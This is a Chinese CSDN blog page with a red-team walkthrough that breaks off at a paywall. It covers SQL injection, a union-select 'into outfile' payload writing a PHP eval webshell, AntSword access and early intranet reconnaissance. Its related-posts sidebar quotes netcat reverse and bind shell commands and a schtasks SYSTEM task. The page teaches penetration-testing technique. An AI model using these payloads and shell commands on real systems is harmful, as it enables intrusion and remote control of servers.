红队攻防之从边界突破到漫游内网(无cs和msf)

最新推荐文章于 2023-11-24 21:10:37 发布
最新推荐文章于 2023-11-24 21:10:37 发布
阅读量1.9k 收藏 9
点赞数 6
分类专栏: 安全 黑客 网络 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/121697131
版权
本文详细介绍了红队攻防过程中,如何通过SQL注入获取shell,利用内网信息收集和提权技巧逐步深入,直至拿下域控主机。涉及SQL注入、Potato提权、reGeorg内网穿透、Mimikatz等工具的使用。
摘要由CSDN通过智能技术生成

前言

网络安全的本质:懂进攻,知防守,先正向,后逆向。

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:
在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:
在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径
在这里插入图片描述
使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径
在这里插入图片描述
验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

→点击获取网络安全学习资料·攻略←

2000多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

内网信息收集

whoami
发现是普通用户的权限
在这里插入图片描述
ipconfig /all
查看用户的IP信息,可以看到位于工作组环境
在这里插入图片描述
route print
查看路由,通往10.0.1网段

最低0.47元/天 解锁文章
IT老涵
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
红队内网攻防渗透:内网渗透之windows内网权限提升技术:哥斯拉&MSF&CS
HACKONE的博客
05-30 475
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权。
linux环境下的"蚂"-wget使用简介
hem的专栏
06-05 1377
 linux环境下的"蚂"-wget使用简介技巧管理员(2000-12-23 09:41)〖返回〗〖转发〗wget的使用形式是:wget [参数列表] URL首先来介绍一下wget的主要参数:· -b:让wget在后台运行,记录文件写在当前目录下"wget-log"文件中;· -t [nuber of times]:尝试次数,当wget无法与服务器建立连接时,尝试连接
【红蓝对抗】边界突破-思维导图
Keylion ,Your Hero
05-30 2231
边界突破 红蓝对抗中,红方的攻击队常见的攻击思路是边界突破——>主机权限获取——>内网渗透——>获取靶机系统权限,本篇博文将利用思维导图直观介绍边界突破中可利用的几个点。 思维导图 ...
红队视角下的防御体系突破之第一篇介绍、阶段、方法
千寻的博客
07-02 1274
红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统,获取利益为目标;而红队则是,提升为目标。此外,对于一般的黑客来说,只要发现某一种攻击方法可以有效地达成目标,通常就没有必要再去尝试其他的攻击方法和途径;但红队的目标则是要尽可能地,因此往往会穷尽已知的“所有”方法来完成攻击。换句话说,红队人员需要的是全面的攻防能力,而不仅仅是一两招很牛的黑客技术。还有一点必须说明:虽然实战攻防演习过程中通常不会严格限定红队的攻击手法,但所有技术的使用,目标的达成,也必须严格遵守国家相关的法律和法规。掌握了目标企业相
内网渗透的边界场景分析+内网代理整理
a167817的博客
03-22 664
先从nc开始理解正向代理和反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.168.16.104 7777 攻击者主机执行 nc -lvp...
中国的工作原理
无痕的博客
01-12 1884
抓包分析中国的工作原理
一直报错怎么办(适合从未链接成功的人观看)
m0_63745032的博客
10-04 1100
各种报错除了其他人说的,还有一个被他们忽略掉的问题,那就是win系统下安全中心,在每次把加载器解压出来的时候,win安全中心都会进行拦截并自动隔离,这个时候你需要点开,允许执行此操作,反复删除解压几次,一定要记得每次都允许执行,然后再次打开应该就没什么问题了。3.然后打开AntSword-Loader-v4.0.3-win32-x64里面的exe文件,这个时候会提示你让你选个文件夹初始化,选择文件夹到antSword-master这个文件夹下即可。作为刚开始接触的新人,一直各种报错怎么办?
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
实战攻防红队视角下的防御体系突破.docx
08-23
实战攻防红队视角下的防御体系突破
内网渗透讲义
03-22
内网渗透讲义
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
最新发布
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动是内网渗透的关键...
安装使用教程(附:上传漏洞示例)
热门推荐
li963820454的博客
04-06 2万+
简单安装使用教程(附带示例)
网络攻防内网安全横向渗透权限提升
weixin_46626737的博客
06-30 752
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网攻防学习Day1——常见的内网结构
dzqxwzoe的博客
08-19 217
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机、网络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
内网安全攻防(一)
YUKIDDDD的博客
08-01 1065
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
防溯源连接WebShell
Vicl1fe的博客
03-04 1827
前言 原理就是通过腾讯云的云函数将我们的求进行转发,目标那里获取到的IP即腾讯云的IP,并且有CDN。 实战 首先我们登陆到腾讯云的控制台https://console.cloud.tencent.com/scf。第一次使用云函数的时候可能需要授权。点击新建 这里直接默认就好,也可以设置一下函数名称和地域。然后点击完成 然后依次点击函数服务->函数管理->函数代码。将下面的代码粘贴到index.py中 # -*- coding: utf8 -*- import requests impor
红队攻防实战之从边界突破漫游内网(无csmsf)
天行健,君子以自强不息
11-24 1535
也许有一天我们再相逢,睁大眼睛看清楚,我才是英雄。
内网安全攻防:渗透测试实战指南》读书笔记(五):域内横向移动分析及防御
闵行小鱼塘
04-18 5308
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章系统的介绍了域内横向移动的主要方法,复现并剖析了内网域方面最重要、最经典的漏洞,同时给出了相应的防范方法
红队视角:网络实战攻防演习中的防御体系挑战与突破
本文主要探讨了网络实战攻防演习中,从红队视角对防御体系的突破,着重讲述了近年来演习的发展趋势和攻防技术的变化。网络实战攻防演习作为一种重要的网络安全检验手段,自2016年以来得到了快速发展,演习的规模、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值